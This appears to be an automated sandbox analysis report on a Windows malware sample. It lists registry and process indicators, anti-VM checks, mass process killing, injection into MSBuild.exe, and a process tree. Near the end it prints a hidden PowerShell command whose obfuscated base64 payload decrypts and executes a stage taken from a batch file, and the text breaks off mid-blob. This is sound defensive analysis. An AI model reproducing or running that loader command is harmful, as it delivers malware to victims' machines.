Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe

Checks processor information in registry 2 TTPs 26 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	68ab528098.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	68ab528098.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
5676	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 64 IoCs

pid	Process
3912	taskkill.exe
4180	taskkill.exe
2956	taskkill.exe
6132	taskkill.exe
6744	taskkill.exe
2800	taskkill.exe
4844	taskkill.exe
4772	taskkill.exe
4672	taskkill.exe
5312	taskkill.exe
6724	taskkill.exe
2392	taskkill.exe
6332	taskkill.exe
6324	taskkill.exe
6412	taskkill.exe
3052	taskkill.exe
1988	taskkill.exe
4388	taskkill.exe
5644	taskkill.exe
3524	taskkill.exe
2256	taskkill.exe
456	taskkill.exe
2348	taskkill.exe
3004	taskkill.exe
1560	taskkill.exe
3224	taskkill.exe
3264	taskkill.exe
6532	taskkill.exe
2672	taskkill.exe
3936	taskkill.exe
2684	taskkill.exe
2628	taskkill.exe
6456	taskkill.exe
4032	taskkill.exe
2712	taskkill.exe
6504	taskkill.exe
2908	taskkill.exe
2600	taskkill.exe
6848	taskkill.exe
5660	taskkill.exe
7004	taskkill.exe
4220	taskkill.exe
436	taskkill.exe
864	taskkill.exe
6220	taskkill.exe
6116	taskkill.exe
7084	taskkill.exe
6964	taskkill.exe
6684	taskkill.exe
1020	taskkill.exe
4292	taskkill.exe
5116	taskkill.exe
2684	taskkill.exe
468	taskkill.exe
4780	taskkill.exe
3328	taskkill.exe
5696	taskkill.exe
6396	taskkill.exe
5448	taskkill.exe
5356	taskkill.exe
2928	taskkill.exe
2248	taskkill.exe
1420	taskkill.exe
4468	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880574374360127"	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3218366390-1258052702-4267193707-1000\{6759DD68-F9A1-4618-8D74-2DE62432B699}	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3218366390-1258052702-4267193707-1000\{58857EAD-B3C2-449F-B981-2ADE1CF4AEB7}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_2447497384.txt\	cmd.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3112	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3108	random.exe
3108	random.exe
5028	rapes.exe
5028	rapes.exe
3456	MSBuild.exe
3456	MSBuild.exe
3456	MSBuild.exe
3456	MSBuild.exe
5036	MSBuild.exe
5036	MSBuild.exe
5036	MSBuild.exe
5036	MSBuild.exe
1168	MSBuild.exe
1168	MSBuild.exe
1168	MSBuild.exe
1168	MSBuild.exe
3328	MSBuild.exe
3328	MSBuild.exe
3328	MSBuild.exe
3328	MSBuild.exe
2344	rapes.exe
2344	rapes.exe
3112	powershell.exe
3112	powershell.exe
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe
4084	captcha.exe
4084	captcha.exe
4084	captcha.exe
4084	captcha.exe
4084	captcha.exe
4084	captcha.exe
3668	powershell.exe
3668	powershell.exe
3668	powershell.exe
2316	275ebaba42.exe
2316	275ebaba42.exe
2316	275ebaba42.exe
2316	275ebaba42.exe
2316	275ebaba42.exe
2316	275ebaba42.exe
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
4844	powershell.exe
4844	powershell.exe
4844	powershell.exe
4008	ac5ed4bbfd.exe
4008	ac5ed4bbfd.exe
4008	43b13e599f.exe
4008	43b13e599f.exe
4716	chrome.exe
4716	chrome.exe
5340	7381290483.exe
5340	7381290483.exe
5340	7381290483.exe
5340	7381290483.exe
5340	7381290483.exe
5340	7381290483.exe
5744	68ab528098.exe
5744	68ab528098.exe
4928	IeGkDOqzXwi9.exe
4928	IeGkDOqzXwi9.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
664	Process not Found
664	Process not Found

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1448	p3hx1_003.exe
1448	p3hx1_003.exe
1448	p3hx1_003.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	2904	tasklist.exe
Token: SeDebugPrivilege	4164	tasklist.exe
Token: SeDebugPrivilege	4984	tasklist.exe
Token: SeDebugPrivilege	1716	tasklist.exe
Token: SeDebugPrivilege	3668	powershell.exe
Token: SeDebugPrivilege	2592	tasklist.exe
Token: SeDebugPrivilege	4652	tasklist.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	4504	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4072	powershell.exe
Token: SeSecurityPrivilege	4072	powershell.exe
Token: SeTakeOwnershipPrivilege	4072	powershell.exe
Token: SeLoadDriverPrivilege	4072	powershell.exe
Token: SeSystemProfilePrivilege	4072	powershell.exe
Token: SeSystemtimePrivilege	4072	powershell.exe
Token: SeProfSingleProcessPrivilege	4072	powershell.exe
Token: SeIncBasePriorityPrivilege	4072	powershell.exe
Token: SeCreatePagefilePrivilege	4072	powershell.exe
Token: SeBackupPrivilege	4072	powershell.exe
Token: SeRestorePrivilege	4072	powershell.exe
Token: SeShutdownPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeSystemEnvironmentPrivilege	4072	powershell.exe
Token: SeRemoteShutdownPrivilege	4072	powershell.exe
Token: SeUndockPrivilege	4072	powershell.exe
Token: SeManageVolumePrivilege	4072	powershell.exe
Token: 33	4072	powershell.exe
Token: 34	4072	powershell.exe
Token: 35	4072	powershell.exe
Token: 36	4072	powershell.exe
Token: SeDebugPrivilege	4048	tasklist.exe
Token: SeDebugPrivilege	2300	tasklist.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	5024	tasklist.exe
Token: SeDebugPrivilege	1988	tasklist.exe
Token: SeDebugPrivilege	3876	tasklist.exe
Token: SeDebugPrivilege	4524	tasklist.exe
Token: SeDebugPrivilege	3556	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	1676	tasklist.exe
Token: SeDebugPrivilege	436	taskkill.exe
Token: SeDebugPrivilege	1072	tasklist.exe
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeDebugPrivilege	3160	tasklist.exe
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	864	taskkill.exe
Token: SeDebugPrivilege	456	taskkill.exe
Token: SeDebugPrivilege	468	taskkill.exe
Token: SeDebugPrivilege	2248	taskkill.exe
Token: SeDebugPrivilege	2908	taskkill.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeDebugPrivilege	1420	taskkill.exe
Token: SeDebugPrivilege	2928	taskkill.exe
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeDebugPrivilege	2916	taskkill.exe
Token: SeDebugPrivilege	3004	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	4524	taskkill.exe
Token: SeDebugPrivilege	1020	taskkill.exe
Token: SeDebugPrivilege	3912	taskkill.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
3108	random.exe
4716	chrome.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
808	msedge.exe
5552	b57d7fa1b5.exe
808	msedge.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5892	firefox.exe
5552	b57d7fa1b5.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5552	b57d7fa1b5.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5552	b57d7fa1b5.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5892	firefox.exe
5552	b57d7fa1b5.exe
5552	b57d7fa1b5.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5892	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3108 wrote to memory of 5028	3108	random.exe	89
PID 3108 wrote to memory of 5028	3108	random.exe	89
PID 3108 wrote to memory of 5028	3108	random.exe	89
PID 5028 wrote to memory of 4620	5028	rapes.exe	95
PID 5028 wrote to memory of 4620	5028	rapes.exe	95
PID 4620 wrote to memory of 4368	4620	XOPPRUc.exe	96
PID 4620 wrote to memory of 4368	4620	XOPPRUc.exe	96
PID 4620 wrote to memory of 4368	4620	XOPPRUc.exe	96
PID 4620 wrote to memory of 1008	4620	XOPPRUc.exe	97
PID 4620 wrote to memory of 1008	4620	XOPPRUc.exe	97
PID 4620 wrote to memory of 1008	4620	XOPPRUc.exe	97
PID 4620 wrote to memory of 3456	4620	XOPPRUc.exe	98
PID 4620 wrote to memory of 3456	4620	XOPPRUc.exe	98
PID 4620 wrote to memory of 3456	4620	XOPPRUc.exe	98
PID 4620 wrote to memory of 3456	4620	XOPPRUc.exe	98
PID 4620 wrote to memory of 3456	4620	XOPPRUc.exe	98
PID 4620 wrote to memory of 3456	4620	XOPPRUc.exe	98
PID 4620 wrote to memory of 3456	4620	XOPPRUc.exe	98
PID 4620 wrote to memory of 3456	4620	XOPPRUc.exe	98
PID 4620 wrote to memory of 3456	4620	XOPPRUc.exe	98
PID 5028 wrote to memory of 3056	5028	rapes.exe	101
PID 5028 wrote to memory of 3056	5028	rapes.exe	101
PID 3056 wrote to memory of 3540	3056	h8NlU62.exe	102
PID 3056 wrote to memory of 3540	3056	h8NlU62.exe	102
PID 3056 wrote to memory of 3540	3056	h8NlU62.exe	102
PID 3056 wrote to memory of 5036	3056	h8NlU62.exe	103
PID 3056 wrote to memory of 5036	3056	h8NlU62.exe	103
PID 3056 wrote to memory of 5036	3056	h8NlU62.exe	103
PID 3056 wrote to memory of 5036	3056	h8NlU62.exe	103
PID 3056 wrote to memory of 5036	3056	h8NlU62.exe	103
PID 3056 wrote to memory of 5036	3056	h8NlU62.exe	103
PID 3056 wrote to memory of 5036	3056	h8NlU62.exe	103
PID 3056 wrote to memory of 5036	3056	h8NlU62.exe	103
PID 3056 wrote to memory of 5036	3056	h8NlU62.exe	103
PID 5028 wrote to memory of 4504	5028	rapes.exe	104
PID 5028 wrote to memory of 4504	5028	rapes.exe	104
PID 4504 wrote to memory of 2800	4504	qWR3lUj.exe	105
PID 4504 wrote to memory of 2800	4504	qWR3lUj.exe	105
PID 4504 wrote to memory of 2800	4504	qWR3lUj.exe	105
PID 4504 wrote to memory of 1168	4504	qWR3lUj.exe	106
PID 4504 wrote to memory of 1168	4504	qWR3lUj.exe	106
PID 4504 wrote to memory of 1168	4504	qWR3lUj.exe	106
PID 4504 wrote to memory of 1168	4504	qWR3lUj.exe	106
PID 4504 wrote to memory of 1168	4504	qWR3lUj.exe	106
PID 4504 wrote to memory of 1168	4504	qWR3lUj.exe	106
PID 4504 wrote to memory of 1168	4504	qWR3lUj.exe	106
PID 4504 wrote to memory of 1168	4504	qWR3lUj.exe	106
PID 4504 wrote to memory of 1168	4504	qWR3lUj.exe	106
PID 5028 wrote to memory of 4512	5028	rapes.exe	107
PID 5028 wrote to memory of 4512	5028	rapes.exe	107
PID 4512 wrote to memory of 4416	4512	YGYZCmt.exe	108
PID 4512 wrote to memory of 4416	4512	YGYZCmt.exe	108
PID 4512 wrote to memory of 4416	4512	YGYZCmt.exe	108
PID 4512 wrote to memory of 3328	4512	YGYZCmt.exe	109
PID 4512 wrote to memory of 3328	4512	YGYZCmt.exe	109
PID 4512 wrote to memory of 3328	4512	YGYZCmt.exe	109
PID 4512 wrote to memory of 3328	4512	YGYZCmt.exe	109
PID 4512 wrote to memory of 3328	4512	YGYZCmt.exe	109
PID 4512 wrote to memory of 3328	4512	YGYZCmt.exe	109
PID 4512 wrote to memory of 3328	4512	YGYZCmt.exe	109
PID 4512 wrote to memory of 3328	4512	YGYZCmt.exe	109
PID 4512 wrote to memory of 3328	4512	YGYZCmt.exe	109
PID 5028 wrote to memory of 4980	5028	rapes.exe	113
PID 5028 wrote to memory of 4980	5028	rapes.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3108
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe
    "C:\Users\Admin\AppData\Local\Temp\10398310101\XOPPRUc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4620
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4368
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1008
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3456
- - C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
    "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3056
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:3540
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5036
- - C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
    "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4504
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:2800
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1168
- - C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe
    "C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4512
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4416
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3328
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2972
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4